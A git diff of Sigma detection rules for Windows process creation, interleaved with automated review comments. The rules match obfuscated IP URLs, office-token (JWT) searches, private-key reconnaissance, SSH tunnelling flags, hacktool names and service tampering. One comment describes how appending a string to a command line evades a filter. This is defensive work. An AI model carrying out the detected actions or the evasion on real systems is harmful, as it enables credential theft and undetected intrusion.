@@ -29,26 +28,31 @@ detection: - DownloadFile - DownloadString selection_ip_1: - CommandLine|contains: + CommandLine|contains: - ' 0x' - //0x - .0x - .00x selection_ip_2: - CommandLine|contains|all: + CommandLine|contains|all: - http://% - '%2e' selection_ip_3: - - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} - - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} - - CommandLine|re: https?://0[0-9]{3,11} - - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} - - CommandLine|re: https?://0[0-9]{1,11} - - CommandLine|re: ' [0-7]{7,13}' + # http://81.4.31754 + - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} + # http://81.293898 + - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} + # http://1359248394 + - CommandLine|re: https?://0[0-9]{3,11} + # http://0121.04.0174.012 + - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} + # http://012101076012 + - CommandLine|re: https?://0[0-9]{1,11} + # For octal format + - CommandLine|re: ' [0-7]{7,13}' filter_main_valid_ip: - CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} - condition: process_creation and (selection_command and 1 of selection_ip_* and - not 1 of filter_main_*) + CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} + condition: process_creation and (selection_command and 1 of selection_ip_* and not 1 of filter_main_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml index eefa77263..bc203cdfd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml 
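Review bot: Three of the example comments added above the selection_ip_3 regexes do not match the pattern they annotate: `# http://81.4.31754`, `# http://81.293898` and `# http://1359248394` all lack the leading `0` that `\.0[0-9]{3,4}`, `\.0[0-9]{3,7}` and `https?://0[0-9]{3,11}` require, so a reader testing the rule with those samples will get no hit. Either change the examples to octal-looking values such as `# http://81.4.031754`, `# http://81.0293898` and `# http://01359248394`, or, if the decimal/hybrid forms really are meant to be detected, add non-zero-leading alternatives to the regexes rather than just fixing the comments. Note also that `https?://0[0-9]{1,11}` already subsumes `https?://0[0-9]{3,11}`, so the two lines could be collapsed into one with a single comment. The `' [0-7]{7,13}'` line would benefit from a comment stating that any 7–13 digit number with digits 0–7 after a space will match, since that is the likeliest false-positive source in this rule.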
@@ -1,8 +1,7 @@ title: Obfuscated IP Via CLI id: 56d19cb4-6414-4769-9644-1ed35ffbb148 status: experimental -description: Detects usage of an encoded/obfuscated version of an IP address (hex, - octal, etc.) via command line +description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line references: - https://h.43z.one/ipconverter/ - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608 @@ -24,26 +23,31 @@ detection: - \ping.exe - \arp.exe selection_ip_1: - CommandLine|contains: + CommandLine|contains: - ' 0x' - //0x - .0x - .00x selection_ip_2: - CommandLine|contains|all: + CommandLine|contains|all: - http://% - '%2e' selection_ip_3: - - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} - - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} - - CommandLine|re: https?://0[0-9]{3,11} - - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} - - CommandLine|re: https?://0[0-9]{1,11} - - CommandLine|re: ' [0-7]{7,13}' + # http://81.4.31754 + - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} + # http://81.293898 + - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} + # http://1359248394 + - CommandLine|re: https?://0[0-9]{3,11} + # http://0121.04.0174.012 + - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} + # http://012101076012 + - CommandLine|re: https?://0[0-9]{1,11} + # For octal format + - CommandLine|re: ' [0-7]{7,13}' filter_main_valid_ip: - CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} - condition: process_creation and (selection_img and 1 of selection_ip_* and not - 1 of filter_main_*) + CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} + condition: process_creation and (selection_img and 1 of selection_ip_* and not 1 of filter_main_*) falsepositives: - Unknown level: medium 
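Review bot: The example comments added to selection_ip_3 are out of step with the regexes in the same way as in the download variant of this rule: `# http://81.4.31754`, `# http://81.293898` and `# http://1359248394` have no leading zero, while the annotated patterns require `\.0[0-9]{3,4}`, `\.0[0-9]{3,7}` and `https?://0[0-9]{3,11}`. Use examples that actually match, e.g. `# http://81.4.031754`, `# http://81.0293898`, `# http://01359248394`, so the comments double as test inputs. If the intent is to also catch plain decimal or hybrid forms, that needs a regex change, not a comment change.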
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_office_token_search.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_office_token_search.yml index ba836f655..fcd991290 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_office_token_search.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_office_token_search.yml @@ -1,9 +1,7 @@ title: Suspicious Office Token Search Via CLI id: 6d3a3952-6530-44a3-8554-cf17c116c615 status: test -description: Detects possible search for office tokens via CLI by looking for the - string "eyJ0eX". This string is used as an anchor to look for the start of the - JWT token used by office and similar apps. +description: Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps. references: - https://mrd0x.com/stealing-tokens-from-office-applications/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: - - eyJ0eXAiOi + CommandLine|contains: + - eyJ0eXAiOi # {"typ": - ' eyJ0eX' - ' "eyJ0eX"' - - ' ''eyJ0eX''' + - " 'eyJ0eX'" condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_parents.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_parents.yml index 428d0c233..e4f2a91fa 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_parents.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_parents.yml 
@@ -1,8 +1,7 @@ title: Suspicious Process Parents id: cbec226f-63d9-4eca-9f52-dfb6652f24df status: test -description: Detects suspicious parent processes that should not have any children - or should only have a single possible child program +description: Detects suspicious parent processes that should not have any children or should only have a single possible child program references: - https://twitter.com/x86matthew/status/1505476263464607744?s=12 - https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b @@ -29,6 +28,7 @@ detection: ParentImage|endswith: - \csrss.exe - \certutil.exe + # - '\schtasks.exe' - \eventvwr.exe - \calc.exe - \notepad.exe @@ -36,14 +36,13 @@ detection: Image|endswith: - \WerFault.exe - \wermgr.exe - - \conhost.exe - - \mmc.exe - - \win32calc.exe + - \conhost.exe # csrss.exe, certutil.exe + - \mmc.exe # eventvwr.exe + - \win32calc.exe # calc.exe - \notepad.exe filter_null: - Image: null - condition: process_creation and (selection or ( selection_special and not 1 of - filter_* )) + Image: + condition: process_creation and (selection or ( selection_special and not 1 of filter_* )) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml index 2220e496b..cc3a99ad9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml 
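Review bot: The rewritten `filter_null` now reads `Image:` with no value, relying on YAML's implicit null where the old line said `Image: null` explicitly; for a compliant parser this is the same value, but the empty form looks like a truncated line and hides the Sigma meaning (match when the field is absent). I would keep `Image: null` as it was. The newly added `# - '\schtasks.exe'` entry under ParentImage has no rationale; either drop it or annotate why it is parked, e.g. `# - '\schtasks.exe'  # disabled: too noisy as a parent, see FP discussion`, so the next editor does not silently re-enable it.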
@@ -1,11 +1,10 @@ title: Privilege Escalation via Named Pipe Impersonation id: 9bd04a79-dabe-4f1f-a5ff-92430265c96b related: - - id: f35c5d71-b489-4e22-a115-f003df287317 - type: derived + - id: f35c5d71-b489-4e22-a115-f003df287317 + type: derived status: test -description: Detects a remote file copy attempt to a hidden network share. This may - indicate lateral movement or data staging activity. +description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. references: - https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html author: Tim Rauch @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_name: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE + - Image|endswith: + - \cmd.exe + - \powershell.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - echo - '>' - \\\\.\\pipe\\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_private_keys_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_private_keys_recon.yml index 5c139c16a..595f64922 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_private_keys_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_private_keys_recon.yml 
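Review bot: The reflowed description in the first hunk still does not describe this rule: it says "Detects a remote file copy attempt to a hidden network share", while the title is "Privilege Escalation via Named Pipe Impersonation" and the selection (second hunk) matches `echo`, `>` and `\\.\pipe\` in a cmd.exe/powershell.exe command line. Since the text was touched anyway, replace it with something grounded in the detection, e.g. `description: Detects "echo" output being redirected into a named pipe ("\\.\pipe\") from cmd.exe or powershell.exe, a pattern associated with privilege escalation via named pipe impersonation.` The condition and the rest of the detection block are outside this hunk.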
@@ -1,8 +1,7 @@ title: Private Keys Reconnaissance Via CommandLine Tools id: 213d6a77-3d55-4ce8-ba74-fcfef741974e status: test -description: Adversaries may search for private key certificate files on compromised - systems for insecurely stored credential +description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -20,24 +19,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cmd_cli: - CommandLine|contains: 'dir ' + CommandLine|contains: 'dir ' selection_pwsh_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: 'Get-ChildItem ' + CommandLine|contains: 'Get-ChildItem ' selection_findstr: - - Image|endswith: \findstr.exe - - OriginalFileName: FINDSTR.EXE + - Image|endswith: \findstr.exe + - OriginalFileName: FINDSTR.EXE selection_ext: - CommandLine|contains: + CommandLine|contains: - .key - .pgp - .gpg @@ -48,8 +47,7 @@ detection: - .cer - .p7b - .asc - condition: process_creation and (selection_ext and (all of selection_cmd_* or - all of selection_pwsh_* or selection_findstr)) + condition: process_creation and (selection_ext and (all of selection_cmd_* or all of selection_pwsh_* or selection_findstr)) falsepositives: - Unknown level: medium 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml index 3d75e99ac..114dad09c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml @@ -1,8 +1,7 @@ title: Suspicious RunAs-Like Flag Combination id: 50d66fb0-03f8-4da0-8add-84e77d12a020 status: test -description: Detects suspicious command line flags that let the user set a target - user and command as e.g. seen in PsExec-like tools +description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools references: - https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html author: Florian Roth (Nextron Systems) @@ -18,16 +17,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_user: - CommandLine|contains: + CommandLine|contains: - ' -u system ' - ' --user system ' - ' -u NT' - ' -u "NT' - - ' -u ''NT' + - " -u 'NT" - ' --system ' - ' -u administrator ' selection_command: - CommandLine|contains: + CommandLine|contains: - ' -c cmd' - ' -c "cmd' - ' -c powershell' diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_proc_wrong_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_proc_wrong_parent.yml index fffbb82f8..e17723030 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_proc_wrong_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_proc_wrong_parent.yml 
@@ -33,20 +33,20 @@ detection: - \wininit.exe - \winlogon.exe filter_sys: - - ParentImage|endswith: - - \SavService.exe - - \ngen.exe - - ParentImage|contains: - - \System32\ - - \SysWOW64\ + - ParentImage|endswith: + - \SavService.exe + - \ngen.exe + - ParentImage|contains: + - \System32\ + - \SysWOW64\ filter_msmpeng: ParentImage|contains: - \Windows Defender\ - \Microsoft Security Client\ ParentImage|endswith: \MsMpEng.exe filter_null: - - ParentImage: null - - ParentImage: '-' + - ParentImage: + - ParentImage: '-' condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Some security products seem to spawn these diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_progname.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_progname.yml index db85c6bf5..f6a0bc46e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_progname.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_progname.yml @@ -1,8 +1,7 @@ title: Suspicious Program Names id: efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6 status: test -description: Detects suspicious patterns in program names or folders that are often - found in malicious samples or hacktools +description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: Florian Roth (Nextron Systems) 
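Review bot: In `filter_null` the first list entry became `- ParentImage:` with an empty value where it previously read `- ParentImage: null`; YAML treats both as null, but the bare key reads as an accidentally cut line next to the sibling `- ParentImage: '-'` and obscures the Sigma semantics (field not present). Keep the explicit form, `- ParentImage: null`, which is also what the rest of the converted rule set used before this change. A one-line comment on the filter, e.g. `# ParentImage missing or "-": Sysmon could not resolve the parent`, would make the intent of the two entries clear to anyone tuning the rule.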
@@ -20,21 +19,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|contains: - - \CVE-202 - - \CVE202 - - Image|endswith: - - \poc.exe - - \artifact.exe - - \artifact64.exe - - \artifact_protected.exe - - \artifact32.exe - - \artifact32big.exe - - obfuscated.exe - - obfusc.exe - - \meterpreter + - Image|contains: + - \CVE-202 # Update this when we reach the year 2100 + - \CVE202 # Update this when we reach the year 2100 + - Image|endswith: + - \poc.exe + - \artifact.exe + - \artifact64.exe + - \artifact_protected.exe + - \artifact32.exe + - \artifact32big.exe + - obfuscated.exe + - obfusc.exe + - \meterpreter selection_commandline: - CommandLine|contains: + CommandLine|contains: - inject.ps1 - Invoke-CVE - pupy.ps1 diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_recon.yml index 387a0d519..64da4cc8e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_recon.yml @@ -1,11 +1,10 @@ title: Recon Information for Export with Command Prompt id: aa2efee7-34dd-446e-8a37-40790a66efd7 related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: similar + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: similar status: test -description: Once established within a system or network, an adversary may use automated - techniques for collecting internal data. +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md author: frack113 
@@ -23,15 +22,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|endswith: - - \tree.com - - \WMIC.exe - - \doskey.exe - - \sc.exe - - OriginalFileName: - - wmic.exe - - DOSKEY.EXE - - sc.exe + - Image|endswith: + - \tree.com + - \WMIC.exe + - \doskey.exe + - \sc.exe + - OriginalFileName: + - wmic.exe + - DOSKEY.EXE + - sc.exe selection_redirect: ParentCommandLine|contains: - ' > %TEMP%\' diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml index 1226398cd..0c1582ff1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml @@ -1,11 +1,10 @@ title: Suspicious Process Execution From Fake Recycle.Bin Folder id: 5ce0f04e-3efc-42af-839d-5b3a543b76c0 related: - - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca - type: derived + - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca + type: derived status: experimental -description: Detects process execution from a fake recycle bin folder, often used - to avoid security solution. +description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. references: - https://www.mandiant.com/resources/blog/infected-usb-steal-secrets - https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/ @@ -25,6 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|contains: + # e.g. C:\$RECYCLER.BIN - RECYCLERS.BIN\ - RECYCLER.BIN\ condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml index 98f5aabbe..95cee3fac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml @@ -1,8 +1,7 @@ title: Suspicious Redirection to Local Admin Share id: ab9e3b40-0c85-4ba1-aede-455d226fd124 status: test -description: Detects a suspicious output redirection to the local admins share, this - technique is often found in malicious scripts or hacktool stagers +description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers references: - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html @@ -21,9 +20,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_redirect: - CommandLine|contains: '>' + CommandLine|contains: '>' selection_share: - CommandLine|contains: + CommandLine|contains: - \\\\127.0.0.1\\admin$\\ - \\\\localhost\\admin$\\ condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml index 35bfbe97d..b28adcdc9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml 
@@ -1,9 +1,7 @@ title: Potential Remote Desktop Tunneling id: 8a3038e8-9c9d-46f8-b184-66234a160f6f status: test -description: Detects potential use of an SSH utility to establish RDP over a reverse - SSH Tunnel. This can be used by attackers to enable routing of network packets - that would otherwise not reach their intended destination. +description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. references: - https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html author: Tim Rauch @@ -20,9 +18,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: :3389 + CommandLine|contains: :3389 # RDP port and usual SSH tunneling related switches in command line selection_opt: - CommandLine|contains: + CommandLine|contains: - ' -L ' - ' -P ' - ' -R ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_right_to_left_override.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_right_to_left_override.yml index 88af6b4bf..bab099b37 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_right_to_left_override.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_right_to_left_override.yml 
@@ -1,12 +1,9 @@ title: Potential Defense Evasion Via Right-to-Left Override id: ad691d92-15f2-4181-9aa4-723c74f9ddc3 status: test -description: 'Detects the presence of the "u202+E" character, which causes a terminal, - browser, or operating system to render text in a right-to-left sequence. - +description: | + Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques. - - ' references: - https://redcanary.com/blog/right-to-left-override/ - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method @@ -25,10 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: "\u202E" + CommandLine|contains: ‮ condition: process_creation and selection falsepositives: - - Commandlines that contains scriptures such as arabic or hebrew might make use - of this character + - Commandlines that contains scriptures such as arabic or hebrew might make use of this character level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml index 591719d6e..4e7b287cd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml 
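Review bot: The selection now embeds the raw U+202E code point (`CommandLine|contains: ‮`) instead of the YAML escape `"\u202E"`, which makes the only matching value in this rule invisible in most editors and vulnerable to being stripped or normalised by copy-paste, diff viewers and text tooling; it also plants a bidi control character in the repository, which forges such as GitHub flag as a potential trojan-source issue. Keep the escaped form, `CommandLine|contains: "\u202E"`, and add a comment such as `# RIGHT-TO-LEFT OVERRIDE (U+202E), kept escaped so the value stays visible and survives tooling`. The reflowed description still carries the typo `"u202+E"`; it should read `"U+202E"`.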
@@ -1,8 +1,7 @@ title: Script Interpreter Execution From Suspicious Folder id: 1228c958-e64e-4e71-92ad-7d429f4138ba status: test -description: Detects a suspicious script execution in temporary folders or folders - accessible by environment variables +description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables references: - https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military @@ -27,7 +26,7 @@ detection: - \mshta.exe - \wscript.exe selection_proc_flags: - CommandLine|contains: + CommandLine|contains: - ' -ep bypass ' - ' -ExecutionPolicy bypass ' - ' -w hidden ' @@ -40,7 +39,7 @@ detection: - mshta.exe - wscript.exe selection_folders_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - \AppData\Local\Temp @@ -48,15 +47,15 @@ detection: - \Temporary Internet - \Windows\Temp selection_folders_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ condition: process_creation and (1 of selection_proc_* and 1 of selection_folders_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_temp.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_temp.yml index 92b5cce00..0cf8b4826 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_temp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_script_exec_from_temp.yml 
@@ -25,7 +25,7 @@ detection: - \mshta.exe - \wscript.exe - \cscript.exe - CommandLine|contains: + CommandLine|contains: - \Windows\Temp - \Temporary Internet - \AppData\Local\Temp @@ -34,12 +34,12 @@ detection: - '%TMP%' - '%LocalAppData%\Temp' filter: - CommandLine|contains: + CommandLine|contains: - ' >' - Out-File - ConvertTo-Json - - -WindowStyle hidden -Verb runAs - - \Windows\system32\config\systemprofile\AppData\Local\Temp\Amazon\EC2-Windows\ + - -WindowStyle hidden -Verb runAs # VSCode behaviour if file cannot be written as current user + - \Windows\system32\config\systemprofile\AppData\Local\Temp\Amazon\EC2-Windows\ # EC2 AWS condition: process_creation and (selection and not filter) falsepositives: - Administrative scripts diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_service_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_service_creation.yml index 941d9f10f..6b25f3b08 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_service_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_service_creation.yml @@ -1,11 +1,10 @@ title: Suspicious New Service Creation id: 17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8 related: - - id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab - type: derived + - id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab + type: derived status: test -description: Detects creation of a new service via "sc" command or the powershell - "new-service" cmdlet with suspicious binary paths +description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html 
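Review bot: The `filter` block drops any interpreter command line that merely contains `-WindowStyle hidden -Verb runAs`, and the new `# VSCode behaviour ...` comment explains the intent without narrowing the match, so an attacker launching `powershell.exe` from `\AppData\Local\Temp` suppresses the alert by appending that string. Because CommandLine is attacker-controlled, the exclusion should be tied to the legitimate producer the way the EC2 entry is tied to a full path — for example a `ParentImage|endswith: \Code.exe` clause alongside the string (hedged: confirm the actual parent from the VS Code case). The same caveat applies to `' >'`, `Out-File` and `ConvertTo-Json`, which are trivially added to any command line. The `selection` block starts above the first hunk on this line.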
@@ -26,15 +25,16 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_sc: Image|endswith: \sc.exe - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath= selection_posh: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName susp_binpath: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious commands or binaries - powershell - mshta - wscript @@ -46,6 +46,7 @@ detection: - cmd.exe /k - cmd.exe /r - rundll32 + # Add more suspicious paths - C:\Users\Public - \Downloads\ - \Desktop\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_service_tamper.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_service_tamper.yml index 0dd5b8153..de381263c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_service_tamper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_service_tamper.yml 
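Review bot: `susp_binpath` is a substring match over the whole CommandLine rather than over the `binPath=`/`-BinaryPathName` value, so the strings the new `# Add more suspicious commands or binaries` and `# Add more suspicious paths` comments invite contributors to add will also fire on service or display names that happen to contain them (e.g. a service named `rundll32helper`), while a binary referenced through an environment variable or 8.3 name is missed. The comment should say so: `# NOTE: matched against the full command line, not only the binPath value`. `C:\Users\Public` also hard-codes the drive letter where the neighbouring script-folder rule in this patch uses `:\Users\Public\`; `:\Users\Public\` would be consistent and drive-agnostic. The list continues below this hunk.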
@@ -1,16 +1,14 @@ title: Suspicious Windows Service Tampering id: ce72ef99-22f1-43d4-8695-419dcb5d9330 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: derived - - id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b - type: obsoletes - - id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: derived + - id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b + type: obsoletes + - id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b + type: obsoletes status: experimental -description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in - order to stop, pause or delete critical or important Windows services such as - AV, Backup, etc. As seen being used in some ransomware scripts +description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts references: - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg - 